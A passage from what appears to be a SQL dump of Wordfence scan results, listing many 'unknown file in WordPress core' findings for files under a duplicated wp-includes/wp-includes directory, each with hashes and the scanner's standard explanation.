rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/class-wp-rewrite.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26782,1631424870,1631424870,'new','knownfile',75,'7847861f30970cec4b64285c1cdc8424','629319fe02592198cb044faf47be0ac3','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-role.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-role.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26783,1631424870,1631424870,'new','knownfile',75,'f6b6fb60e85e85206974810aee0b198d','a4f684896f8093413cc560a337017f1a','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-roles.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-roles.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26784,1631424870,1631424870,'new','knownfile',75,'f12b27abdd06d872749835db35b43e00','67d655eb1a234275fb4e8ef761d34f36','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-session-tokens.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/class-wp-session-tokens.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26785,1631424870,1631424870,'new','knownfile',75,'d409ce56062314c2dbeee3930ba227a4','12e055bf46f9e785f098fa2cd6c8799d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-simplepie-file.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/class-wp-simplepie-file.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26786,1631424870,1631424870,'new','knownfile',75,'5143884bbc4adcbffde2ad7daa1e423e','7c7995df88cb7ea537fcc7dfcbb075ff','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-simplepie-sanitize-kses.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/class-wp-simplepie-sanitize-kses.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26787,1631424870,1631424870,'new','knownfile',75,'49842ecc9a94475b04663d56cb3dcd08','3a471b17335b39bd08a7c842e157edbe','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-site-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-site-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26788,1631424871,1631424871,'new','knownfile',75,'e622d8d6ff0a18aa0af79ffd4af71c22','eadef06e166e249e719ae0cc5fad332c','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-site.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-site.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26789,1631424871,1631424871,'new','knownfile',75,'f3f612ca95ecce0dc57e1e4decaf4fe9','88499bb4caef1a4500be99a92da88026','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-tax-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-tax-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26790,1631424871,1631424871,'new','knownfile',75,'e5983fe80e12b944d6eb52d239b3ea7e','026dca1a5226de2f52a76d68606db339','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-taxonomy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/class-wp-taxonomy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26791,1631424871,1631424871,'new','knownfile',75,'fbcbd0479faa9cdd5f73118793e50b44','497da53fd4160e0915c74fbf974752a6','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-term-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-term-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26792,1631424871,1631424871,'new','knownfile',75,'d7eb77323ce4cf9814176466482ffe23','c65c0e0c993f6bbdfac06802115f6676','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-term.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-term.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26793,1631424871,1631424871,'new','knownfile',75,'b6097c8e96bff41fbf3f2ec5fbfd0915','cc47083706e3f74172717ca739a5078d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-text-diff-renderer-inline.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/class-wp-text-diff-renderer-inline.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26794,1631424872,1631424872,'new','knownfile',75,'5efb19a5d32bf1406f2788065ce2873e','8f2ba1b4b3a36fdd24aebd2cd15e71a7','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-text-diff-renderer-table.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/class-wp-text-diff-renderer-table.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26795,1631424872,1631424872,'new','knownfile',75,'a61f2721b9f6d666c8ba3cd0ab8b18c8','b1a40f1a3b8ddd60ae92a9f2528b08fa','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-theme.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-theme.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26796,1631424872,1631424872,'new','knownfile',75,'ca03eed53bdfcd23afb4914eac4a11a0','da1c2e5dbaf61733c0a2cbfecefa5bfb','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-user-meta-session-tokens.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/class-wp-user-meta-session-tokens.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26797,1631424872,1631424872,'new','knownfile',75,'7d7338720b371bc706c62e4e570a9e81','1ee72b01e3bb4d63dbddd096e10f2d0c','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-user-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-user-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26798,1631424872,1631424872,'new','knownfile',75,'fe5da5c7437c28383d1ee2a9dd038bd4','b48b83eeec9c77ea788e7740aea8b79c','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-user-request.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-user-request.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26799,1631424872,1631424872,'new','knownfile',75,'12dd0cf73ba278bf78ec372154eb1e4c','5a6dee6b45327475acb6a1ec8b90ee92','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-user.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-user.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26800,1631424872,1631424872,'new','knownfile',75,'75fa282baddaa8ac806e181e4c4f0d03','9aee99f809bb2999b6b9090640f76356','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-walker.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-walker.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26801,1631424873,1631424873,'new','knownfile',75,'c26216a1c55064173a7aaeae8db974d5','b0fda41ea3315690b2b3b072f4730cf3','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-widget-factory.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/class-wp-widget-factory.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26802,1631424873,1631424873,'new','knownfile',75,'823ea618da74c2eeb3b01576c8c33dab','99b81f48c6ada10dbdb5e029f726e173','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-widget.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-widget.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26803,1631424873,1631424873,'new','knownfile',75,'a1b773dc6b371f44dbd7b33888598f9c','21bd578467de26221fd9b23dbfbc9918','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-xmlrpc-server.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-xmlrpc-server.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26804,1631424874,1631424874,'new','knownfile',75,'891c8a5dd60e0ba3e9c8a5732d64b8eb','cca00a349d565ac6a8d622a85fc4798d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/class-wp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26805,1631424874,1631424874,'new','knownfile',75,'9ce3599086f57775e4f19e419cdc2e39','0352f0866b3e26b348b681b382ff0d2d','Unknown file in WordPress core: wp-includes/wp-includes/class.wp-dependencies.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class.wp-dependencies.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26806,1631424874,1631424874,'new','knownfile',75,'fb84acc51bab8c80f6171f92af798d32','53b5fdde2ccb9d6763fb1c6eafc9f076','Unknown file in WordPress core: wp-includes/wp-includes/class.wp-scripts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/class.wp-scripts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26807,1631424875,1631424875,'new','knownfile',75,'1cd6c0fb120038723cfbf0dbe866103a','6fdb751db29d64ff34269db971d48483','Unknown file in WordPress core: wp-includes/wp-includes/class.wp-styles.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class.wp-styles.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26808,1631424875,1631424875,'new','knownfile',75,'ce32fe6706c75236eed6459d8bb85750','1bf3fdd2528abab313ed60df5f6beafa','Unknown file in WordPress core: wp-includes/wp-includes/comment-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/comment-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26809,1631424875,1631424875,'new','knownfile',75,'1c119c7d7a202ae29c6f3928c260d700','7e641e464e9de3098706a385465e863d','Unknown file in WordPress core: wp-includes/wp-includes/comment.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/comment.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26810,1631424875,1631424875,'new','knownfile',75,'e761ee39c6a03141aecbd20b1d98ef89','16618b570c06f6ace343eb55deb2ff2a','Unknown file in WordPress core: wp-includes/wp-includes/compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26811,1631424875,1631424875,'new','knownfile',75,'4fe7110b55a836ed5ffb5e6dcce5ffeb','405f3eba08bf8129aa63d98f05d72374','Unknown file in WordPress core: wp-includes/wp-includes/cron.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/cron.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26812,1631424875,1631424875,'new','knownfile',75,'51a21370f61415c0ae3c2755bb03803d','00ed3fc970675eadf427a99a0c4fdb22','Unknown file in WordPress core: wp-includes/wp-includes/css/admin-bar-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/css/admin-bar-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26813,1631424875,1631424875,'new','knownfile',75,'70895e53d1d8dc9249c0ee1d5aacec02','1720e04b888a607225e4a5dad7cfe06b','Unknown file in WordPress core: wp-includes/wp-includes/css/admin-bar-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/admin-bar-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26814,1631424875,1631424875,'new','knownfile',75,'6a0d51133df33bcb9a62d9da35223af4','28f6d8366c8998ee149eea8593dc9130','Unknown file in WordPress core: wp-includes/wp-includes/css/admin-bar.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/css/admin-bar.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26815,1631424875,1631424875,'new','knownfile',75,'1d3442ac03839f952efc77bb08c7528d','63405de0472eb6630c5f5100f0cb4eb9','Unknown file in WordPress core: wp-includes/wp-includes/css/admin-bar.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/css/admin-bar.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26816,1631424875,1631424875,'new','knownfile',75,'195bece47da8f5601e156127b39df4b1','3ec439475fa4db394c1e8eff751e049b','Unknown file in WordPress core: wp-includes/wp-includes/css/buttons-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/css/buttons-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26817,1631424875,1631424875,'new','knownfile',75,'ba26fe7a58414cf93c1624b8263c74f4','1ccb26b0eb6b0e15e228810f9f33d5ae','Unknown file in WordPress core: wp-includes/wp-includes/css/buttons-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/css/buttons-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26818,1631424875,1631424875,'new','knownfile',75,'b3ccbc737e26770ec44b8468602d6d8d','a5ddb1da98d63723ecbbbc6831d94a0a','Unknown file in WordPress core: wp-includes/wp-includes/css/buttons.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/css/buttons.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26819,1631424876,1631424876,'new','knownfile',75,'39896f81d8741260f57039e45020cd6d','3614c0494170c462569e4e541461c3fa','Unknown file in WordPress core: wp-includes/wp-includes/css/buttons.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/css/buttons.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26820,1631424876,1631424876,'new','knownfile',75,'fb03681ca75151ed018505f819a2564d','e79ac9419abc3fb7dfaf3354f21c899c','Unknown file in WordPress core: wp-includes/wp-includes/css/customize-preview-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/customize-preview-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26821,1631424876,1631424876,'new','knownfile',75,'7dd2744e5e2c1d5a0c03ca551c0843d9','40cd72ef27b15c3a6230e484a1530105','Unknown file in WordPress core: wp-includes/wp-includes/css/customize-preview-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 